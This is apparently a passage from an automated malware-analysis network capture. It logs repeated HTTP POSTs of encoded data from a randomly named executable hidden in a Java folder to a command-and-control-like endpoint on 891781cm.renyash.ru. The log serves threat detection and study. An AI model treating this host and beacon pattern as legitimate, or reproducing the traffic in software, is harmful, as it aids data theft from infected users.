                                                                                                                  Jan 1, 2025 15:02:33.337678909 CET | 1072 | OUT | Data Raw: 55 54 58 56 5f 5a 51 58 55 5a 54 59 51 53 55 57 58 5c 5c 5d 59 56 52 5a 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: UTXV_ZQXUZTYQSUWX\\]YVRZ][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\ ]<,2 2Z>=0'&.$'32V&,Y->?$S><#^!'^)
                                                                                                                  Jan 1, 2025 15:02:33.447755098 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:02:33.630218029 CET | 815 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:02:33 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8E2A1TYi491cI%2FhBcCofd9jUzkCqD%2BVwdLWnGNQGiGktCpuRmhW2wzAZnywCxz9E%2F%2FQ7YzwLLM4zHXCs50YqPsoRhVsewW%2BlxomlqSoFr4dwBG%2B6Z8b2b9nJlIpVp%2BleKr7dS%2F8i"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30c36bd259e16-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=3342&min_rtt=2045&rtt_var=3361&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1416&delivery_rate=117523&cwnd=188&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  31 | 192.168.2.4 | 49772 | 104.21.38.84 | 80 | 7448 | C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Jan 1, 2025 15:02:33.765918016 CET | 344 | OUT | POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 15:02:34.118796110 CET | 1072 | OUT | Data Raw: 50 51 58 53 5a 58 54 59 55 5a 54 59 51 58 55 54 58 5e 5c 54 59 5c 52 5a 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: PQXSZXTYUZTYQXUTX^\TY\RZ][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\#+/"7]>&)+Z3$"U:+3%$Z$;=?<8(,#^!'^)+
                                                                                                                  Jan 1, 2025 15:02:34.210144997 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:02:34.393392086 CET | 806 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:02:34 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FofhPKK8lJ1py%2F9tQaPoFj0eTl4KBsLRBUkQj1BqOcSDfxRT8q7fy%2FYgkZbdJkr6aXR124SFrDPo8AEJeYTB%2FN0qzI7pvAgVa87YqVk7nihtfgikE%2FBBseHhD2KQIBLjZX6WUxef"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30c3b8bb68c0c-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1979&min_rtt=1923&rtt_var=834&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1416&delivery_rate=614478&cwnd=205&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  32 | 192.168.2.4 | 49773 | 104.21.38.84 | 80 | 7448 | C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Jan 1, 2025 15:02:34.541537046 CET | 344 | OUT | POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 15:02:34.899904966 CET | 1072 | OUT | Data Raw: 50 55 58 53 5a 5c 51 5e 55 5a 54 59 51 59 55 53 58 5e 5c 5d 59 53 52 5b 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: PUXSZ\Q^UZTYQYUSX^\]YSR[][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\ +<!Y#%>5)#3'1:''%?%0Z<;>/<(=<#^!'^)/
                                                                                                                  Jan 1, 2025 15:02:34.986599922 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:02:35.244199991 CET | 809 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:02:35 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TB29a6AcEAPlllDrKb9g1PA8%2BFldnzme414efeIR%2F%2FnwUGNdILgScL3PG2EI0PAmh1qjdRHE%2FVAceZAboINxyEB%2FrMaJpu0mjFg9ym6HSvG6QYJS0gCdOSJHV3wWCIFYxZ4AR4M2"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30c406e6dc42a-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2119&min_rtt=1472&rtt_var=1846&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1416&delivery_rate=219614&cwnd=199&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  33 | 192.168.2.4 | 49774 | 104.21.38.84 | 80 | 7448 | C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Jan 1, 2025 15:02:35.312424898 CET | 344 | OUT | POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1796
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  34 | 192.168.2.4 | 49775 | 104.21.38.84 | 80 | 7448 | C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Jan 1, 2025 15:02:35.371989012 CET | 344 | OUT | POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 15:02:35.728172064 CET | 1072 | OUT | Data Raw: 50 55 5d 54 5f 5a 51 59 55 5a 54 59 51 5e 55 54 58 52 5c 5d 59 5d 52 5c 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: PU]T_ZQYUZTYQ^UTXR\]Y]R\][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\ ^+>!;1-9\>00-$8]3.U0Z#/8_(-<>#^!'^)3
Jan 1, 2025 15:02:35.830029964 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 15:02:35.993623972 CET | 802 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:02:35 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Xo5cZNCjdmpvO1AeJwJ91HBRNF2JEpno7CSdSsOphuNyGmCmfeUvwRHkJgU%2BileFJjHTchvPjdvNyT68vHibLAY12Ka0VmzI6%2BByfyCbXbI40spm8LuDyPylaQssx5e5RL89VrNF"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30c45ae3943af-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=3760&min_rtt=1771&rtt_var=4642&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1416&delivery_rate=82560&cwnd=229&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
35 | 192.168.2.4 | 49776 | 104.21.38.84 | 80 | 7448 | C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 15:02:36.121766090 CET | 320 | OUT | POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
Jan 1, 2025 15:02:36.477971077 CET | 1072 | OUT | Data Raw: 55 57 5d 51 5a 5e 54 5f 55 5a 54 59 51 5a 55 55 58 5b 5c 5c 59 52 52 53 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: UW]QZ^T_UZTYQZUUX[\\YRRS][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\ (=4(=1"=>0B>U.7(X'U&?;[;?=8*,#^!'^)#
Jan 1, 2025 15:02:36.566731930 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 15:02:36.829408884 CET | 810 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:02:36 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MhIVHgEWaxu%2F%2BL7OL%2F7LLNLVVpbLooX92%2FDbPwzWfm2dxpO4WcDHXNfI%2Bi10JUtiIh1%2BFZ6rfadXaMPkVeLLmxPnmc9iomEIfLxvvUE5F1L%2BKThLt2Af2fLjSi4%2FW0gh4G749P3U"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30c4a480cc44f-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1915&min_rtt=1518&rtt_var=1364&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1392&delivery_rate=310836&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a
                                                                                                                  Data Ascii: 41V[X
Jan 1, 2025 15:02:36.918787003 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
36 | 192.168.2.4 | 49777 | 104.21.38.84 | 80 | 7448 | C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 15:02:37.045202017 CET | 344 | OUT | POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1064
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
Jan 1, 2025 15:02:37.399832010 CET | 1064 | OUT | Data Raw: 55 5e 58 55 5a 58 51 58 55 5a 54 59 51 5b 55 51 58 5e 5c 5a 59 5c 52 5c 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: U^XUZXQXUZTYQ[UQX^\ZY\R\][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\ (%] .&&(.'Y$4V-%/Q$,?/(Z+>#^!'^)7
Jan 1, 2025 15:02:37.500730038 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 15:02:37.746628046 CET | 808 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:02:37 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mAlKsJATTY%2Fv65myMbPOFd8fa%2F0IhBogIfg6A6EOFevbYBVYpzjNLTLmF3D5E9%2BphERRjQpytn%2Bd3ZPIOd8SXg6rLMBq4mJqOXZLE7oyOiEhqgiv3x4kkOmIvKk8Atf3%2F76ZEOl5"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30c50083bf791-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=4169&min_rtt=1473&rtt_var=5944&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1408&delivery_rate=63365&cwnd=146&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
37 | 192.168.2.4 | 49778 | 104.21.38.84 | 80 | 7448 | C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 15:02:37.871830940 CET | 344 | OUT | POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
Jan 1, 2025 15:02:38.228027105 CET | 1072 | OUT | Data Raw: 50 55 58 54 5f 5a 54 5d 55 5a 54 59 51 58 55 5d 58 5d 5c 5c 59 57 52 5d 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: PUXT_ZT]UZTYQXU]X]\\YWR]][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\#(!#+=Z&*)=+''2T-'<$Y60Z<,8<>0*,#^!'^)+
Jan 1, 2025 15:02:38.317608118 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 15:02:38.596086025 CET | 803 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:02:38 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mUubEN2PvDxgafnohdN2tXD130Vt26ZbmnZy2yXxVBXDe4OYD34vSHvnPwjjqrjYhYgY0LiaMaQ%2FmlE5VsbrMvYruNqY1SSpmCaFNUW0G7BGZnDLStlhmvWGkzaGn8PyLQIAeW%2Fv"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30c553d9e4309-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2580&min_rtt=2262&rtt_var=1484&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1416&delivery_rate=303723&cwnd=233&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
38 | 192.168.2.4 | 49779 | 104.21.38.84 | 80 | 7448 | C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 15:02:38.718750954 CET | 344 | OUT | POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
Jan 1, 2025 15:02:39.072726011 CET | 1072 | OUT | Data Raw: 55 52 58 51 5a 5d 54 5e 55 5a 54 59 51 5d 55 57 58 5a 5c 54 59 5d 52 5b 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: URXQZ]T^UZTYQ]UWXZ\TY]R[][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\ X(Y5[78>%X*>X '4:P-4$X3?&3/08-8?+*#^!'^)?
Jan 1, 2025 15:02:39.203114033 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 15:02:39.471451044 CET | 812 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:02:39 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NhB7bNgHsD4T%2FxwamLG9tB%2FXDMT%2F67OTHmBnAA1fAmzAkZ2is13kId52c%2F575gZk5y8bHpC%2F18JNaJhVE5V0e1Ps%2Bs3aEyCOnLP0MtaQa5N4K7DYd2XcFF%2B4Q1uhf0pH145uKpKC"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30c5ab8b942b8-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=4298&min_rtt=1641&rtt_var=5931&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1416&delivery_rate=63744&cwnd=231&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
39 | 192.168.2.4 | 49780 | 104.21.38.84 | 80 | 7448 | C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 15:02:39.608958960 CET | 344 | OUT | POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
Jan 1, 2025 15:02:39.962810993 CET | 1072 | OUT | Data Raw: 55 53 5d 51 5a 5f 51 5b 55 5a 54 59 51 5c 55 5d 58 5e 5c 5e 59 53 52 5d 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: US]QZ_Q[UZTYQ\U]X^\^YSR]][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\ ??* ]-_$.*X3X$:9#$?'<<,- Z<X8W><#^!'^)
Jan 1, 2025 15:02:40.052577019 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 15:02:40.222353935 CET | 805 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:02:40 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UZCPGZqFKlq%2Fi3Xk490qq8ejPz1umJfWS4BPWvLKbUbFSHCh%2BzQEJVQqH2WLtFgpb3%2Fv7NuhnmvtowouJAJlxXsnjM5G3TPmjvY3KZ0lGVGdysF0CVmyZbkSqh8jWqXSMg27gKgG"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30c600fec5e70-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
